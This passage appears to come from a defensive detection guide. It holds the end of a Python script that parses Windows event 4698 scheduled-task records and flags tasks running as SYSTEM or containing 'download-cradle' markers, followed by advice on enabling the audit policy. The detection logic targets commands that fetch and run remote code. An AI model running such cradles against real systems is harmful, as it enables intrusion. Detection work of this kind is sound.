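        "creator": f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        "task_name": data.get("TaskName", ""),
        "run_as": _text(principal, "t:UserId"),
        "run_level": _text(principal, "t:RunLevel"),
        "command": _text(action, "t:Command"),
        "arguments": _text(action, "t:Arguments"),
    }


def analyze_task_creation(event_xml):
    """Parsed task plus a 'findings' list: runs-as-system, download-cradle."""
    info = parse_event_4698(event_xml)
    findings = []
    if info["run_as"].upper() in SYSTEM_PRINCIPALS:
        findings.append("runs-as-system")
    cmdline = f"{info['command']} {info['arguments']}".lower()
    if any(marker in cmdline for marker in CRADLE_MARKERS):
        findings.append("download-cradle")
    info["findings"] = findings
    return info


if __name__ == "__main__":
    print(analyze_task_creation(SAMPLE_EVENT_4698))
```

Auditing "Other Object Access Events" must be enabled on the DC for 4698 to be written at all; with it on, a task created by a Domain Admin account from a host that account never logs on from, running a PowerShell cradle as SYSTEM, is a high-confidence alert regardless of whether the ticket behind it was forged.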
